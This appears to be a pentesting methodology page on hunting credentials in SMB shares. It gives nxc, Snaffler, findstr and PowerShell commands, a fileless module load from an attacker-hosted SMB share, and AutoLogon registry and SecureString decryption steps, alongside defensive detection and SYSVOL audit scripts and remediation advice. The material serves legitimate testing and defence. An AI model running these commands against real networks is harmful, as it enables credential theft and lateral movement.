Methodology Checklist
- List accessible shares: `nxc smb [TARGET] -u [USER] -p [PASS] --shares`
- Spider shares for sensitive files: `nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus`
- Access shares manually: `smbclient //[TARGET]/[SHARE] -U [USER]`
- Search for keywords: `nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus --pattern "password\|cred\|secret"`
- Snaffler for automated credential hunting: `.\Snaffler.exe -s -o snaffler.txt`
- Download interesting files for offline review
- Check Sysvol/Netlogon for GPP passwords
Operational Context
Use when: SMB access obtained → enumerate all accessible shares for credential files, scripts with hardcoded passwords, and sensitive documents.
Think Dumber First: `nxc smb [TARGET] -u [USER] -p [PASS] --shares` to list shares, then the spider_plus module to enumerate file names across all shares without downloading everything. Look for: `.ps1`, `.bat`, `.xml`, `web.config`, `unattend.xml`, `id_rsa`.
Skip when: Shares are empty or only contain public documents → move on quickly.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `net use Z: \\[TARGET_IP]\[SHARE] /user:[DOMAIN]\[USER] [PASS]` | Mount SMB share to drive letter |
| `findstr /S /I /C:"password" *.txt *.xml *.ini *.config *.bat` | Search share contents for "password" (CMD) |
| `Get-ChildItem -Recurse -Force \| Select-String -Pattern "password" -Context 2` | Search share contents (PowerShell) |
| `Get-ChildItem -Recurse -Include *.txt,*.ini,*.cfg,*.xml \| Select-String -Pattern "passw"` | Filter by extension then search (PowerShell) |
| `Snaffler.exe -s` | Auto-enumerate shares and regex-match for credentials |
| `Snaffler.exe -s -u -i "IT"` | Targeted Snaffler scan on specific share name |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern "passw"` | Spider share remotely without mounting |
| `docker run --rm blacklanternsecurity/manspider [TARGET_IP] -c 'passw' -u [USER] -p [PASS]` | MANSPIDER: Docker-based share scanner from Linux |
| `sudo impacket-smbserver share . -smb2support -username test -password test` | Host share to load PowerHuntShares without touching disk |
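Defender's counterpart to the spidering commands above, added here as an example and not part of the original cheatsheet: a sliding-window detector over Event ID 5145-style (Detailed File Share) records that flags an account touching an unusual number of distinct files or shares in a short window. The sample records are constructed, and the window and thresholds are assumed tuning values.

```python
# Detect bulk share spidering (spider_plus / Snaffler style) from SMB audit events.
# Input: Event 5145-like records exported as "timestamp|account|clientIP|share|relativeTarget".
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumed sliding window
FILE_THRESHOLD = 25              # distinct files per account+client inside WINDOW (assumed)
SHARE_THRESHOLD = 3              # distinct shares per account+client inside WINDOW (assumed)

def parse_event(line):
    ts, user, ip, share, path = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "user": user, "ip": ip, "share": share, "path": path}

def detect_spidering(lines):
    """Return one alert per (account, client) whose busiest WINDOW crosses a threshold."""
    by_actor = defaultdict(list)
    for ev in sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"]):
        by_actor[(ev["user"], ev["ip"])].append(ev)
    alerts = []
    for (user, ip), evs in by_actor.items():
        start, best = 0, None
        for end, ev in enumerate(evs):
            while ev["ts"] - evs[start]["ts"] > WINDOW:   # slide the window forward
                start += 1
            window = evs[start:end + 1]
            files = {(w["share"], w["path"]) for w in window}
            shares = {w["share"] for w in window}
            hit = len(files) >= FILE_THRESHOLD or len(shares) >= SHARE_THRESHOLD
            if hit and (best is None or len(files) > best["files"]):
                best = {"user": user, "ip": ip, "files": len(files), "shares": sorted(shares),
                        "first": evs[start]["ts"], "last": ev["ts"]}
        if best:
            alerts.append(best)
    return alerts

def build_sample():
    """Constructed events: one normal user, one account sweeping three shares in 40 seconds."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = [f"{(base + timedelta(minutes=3 * i)).isoformat()}|CORP\\asmith|10.0.0.7|\\\\*\\Finance|{n}"
             for i, n in enumerate(["budget.xlsx", "notes.txt", "plan.docx"])]
    for i in range(40):
        share = ["IT", "HR", "Finance"][i % 3]
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()}|CORP\\svc_backup|10.0.0.5|\\\\*\\{share}|dir{i}\\file{i}.xml")
    return lines

if __name__ == "__main__":
    print(detect_spidering(build_sample()))
```

The normal user reading three files over ten minutes never fills a window, while the sweeping account produces one alert with all 40 files and three shares.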
Deep Dive & Workflow
High-Value Share Targets
| Share Type | Why Valuable |
|---|---|
| IT / SysAdmin | Scripts, config files, SSH keys, backup configs |
| HR / Onboarding | Password lists, initial credentials, identity docs |
| Finance | Excel files with service accounts |
| SYSVOL / NETLOGON | Group Policy scripts, XML with GPP passwords |
| Web root | web.config with DB connection strings |
Keywords and Extensions to Hunt
- Keywords: passw, user, token, key, secret, cred, initial, config
- Extensions: .ini, .cfg, .env, .xlsx, .ps1, .bat, .xml, .config
- Domain name → search for the domain name inside files (INLANEFREIGHT, CORP)
- Localization → non-English environments: Benutzer (German for User), Contrasena (Spanish for Password)
Manual Windows Hunting Workflow

```cmd
:: 1. Mount the share
net use Z: \\[TARGET_IP]\IT /user:corp\[USER] [PASS]
cd /d Z:
:: 2. CMD search (fast, native)
findstr /S /I /C:"password" *.txt *.xml *.ini *.config *.bat
```

```powershell
# 3. PowerShell search (more powerful)
Get-ChildItem -Recurse -Force | Select-String -Pattern "password" -Context 2
```

Snaffler (Best Automated Tool)
C# tool that enumerates accessible shares and applies regex patterns to file contents:

```powershell
Snaffler.exe -s               # scan everything
Snaffler.exe -s -u -i "IT"    # focus on IT share
```

PowerHuntShares (Fileless Execution)
Import PowerHuntShares from a remote SMB share so the module is loaded in memory without dropping files on the target's disk:

```bash
# Attacker: host the script from the directory containing PowerHuntShares.psm1
sudo impacket-smbserver share . -smb2support -username test -password test
```

```powershell
# Target: load and run without writing to disk
$pass = ConvertTo-SecureString 'test' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('test', $pass)
New-PSDrive -Name "P" -PSProvider FileSystem -Root "\\[LHOST]\share" -Credential $cred
Import-Module P:\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
```

Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc spider_plus returns error | Module not available | Use smbclient: `smbclient //[TARGET]/[SHARE] -U [USER]%[PASS] -c 'recurse; ls'` |
| Large share takes too long to enumerate | Thousands of files | Filter by extension: `smbclient ... -c 'recurse; mask *.xml; ls'` |
| File download fails mid-transfer | Large file or slow link | Use `mget` with a specific file, or `get` individual files |
| unattend.xml found but no password | Password already applied and blanked | Check AutoLogon keys in the registry via winreg: `nxc smb [TARGET] -u [USER] -p [PASS] --regquery 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'` |
| Scripts found with encrypted passwords | PowerShell SecureString | Decrypt on Windows: `$cred = Import-Clixml cred.xml; $cred.GetNetworkCredential().Password` (the SecureString is DPAPI-protected, so this only works as the same user on the same host that created the file) |
Reporting Trigger
Finding Title: Credentials Discovered in SMB Network Share Files
Impact: Plaintext or recoverable credentials in network share files (deployment scripts, config files, Group Policy Preferences) enable immediate privilege escalation and lateral movement without exploitation of any technical vulnerability.
Root Cause: IT automation scripts and configuration files stored on network shares with excessive read permissions. No sensitive data classification applied to share content.
Recommendation: Remove all credentials from shared scripts. Implement LAPS for local admin passwords. Remove Group Policy Preferences credential storage (MS14-025 remediation). Restrict share permissions to minimum required access.
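One way to verify the MS14-025 remediation item in the recommendation above, added here as an example and not part of the original page: a Python audit that walks a SYSVOL copy and reports every Group Policy Preferences XML entry that still carries a `cpassword` attribute, without decrypting anything. The sample SYSVOL layout, GUID and values are constructed, and the per-file-type account attribute names are assumed.

```python
# Audit a SYSVOL tree for Group Policy Preferences XML that still stores a cpassword
# attribute (MS14-025 remediation check). Nothing is decrypted; findings are for cleanup.
import os
import tempfile
import xml.etree.ElementTree as ET

GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")  # assumed names per GPP type

def find_cpassword(sysvol_root):
    """Return one finding per element carrying a cpassword attribute under sysvol_root."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                findings.append({"file": path, "account": None, "empty": None, "error": "unparseable XML"})
                continue
            for elem in root.iter():
                cpassword = elem.get("cpassword")
                if cpassword is None:          # attribute absent: this entry stores no credential
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
                findings.append({"file": path, "account": account, "empty": cpassword == "", "error": None})
    return findings

def build_sample_sysvol():
    """Constructed SYSVOL: one Groups.xml with a cpassword, one Drives.xml without."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    prefs = os.path.join(root, "corp.local", "Policies", "{CONSTRUCTED-GUID}", "Machine", "Preferences")
    os.makedirs(os.path.join(prefs, "Groups"))
    os.makedirs(os.path.join(prefs, "Drives"))
    with open(os.path.join(prefs, "Groups", "Groups.xml"), "w") as f:
        f.write('<Groups><User name="helpdesk"><Properties action="U" userName="helpdesk" '
                'cpassword="CONSTRUCTED_NOT_A_REAL_VALUE" changeLogon="0"/></User></Groups>')
    with open(os.path.join(prefs, "Drives", "Drives.xml"), "w") as f:
        f.write('<Drives><Drive name="H:"><Properties action="U" path="\\\\fs01\\home"/></Drive></Drives>')
    return root

if __name__ == "__main__":
    for hit in find_cpassword(build_sample_sysvol()):
        print(hit)
```

Point it at `\\<domain>\SYSVOL` (or an offline copy) and treat every non-empty hit as a credential to rotate and an XML entry to remove.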